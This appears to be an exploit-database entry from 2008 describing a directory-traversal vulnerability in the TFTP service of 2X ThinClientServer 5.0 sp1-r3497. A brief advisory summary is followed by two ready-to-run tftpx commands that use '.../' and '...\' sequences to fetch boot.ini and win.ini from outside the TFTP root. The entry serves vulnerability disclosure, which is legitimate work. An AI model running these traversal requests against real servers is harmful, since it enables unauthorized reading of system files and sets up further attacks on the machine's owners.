2X ThinClientServer 5.0 sp1-r3497 TFTP Service - Directory Traversal

Javier Perez 29.03.2008 Verified
Remote Exploits Windows

Exploit Code

source: http://www.securityfocus.com/bid/28504/info

2X ThinClientServer is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.

Exploiting this issue allows an attacker to access arbitrary files outside of the TFTP application's root directory. This can expose sensitive information that could help the attacker launch further attacks.

2X ThinClientServer 5.0 sp1-r3497 with TFTPd.exe 3.2.0.0 is vulnerable; other versions may also be affected.

tftpx SERVER .../.../.../.../.../.../boot.ini none
tftpx SERVER ...\...\...\...\...\...\windows\win.ini none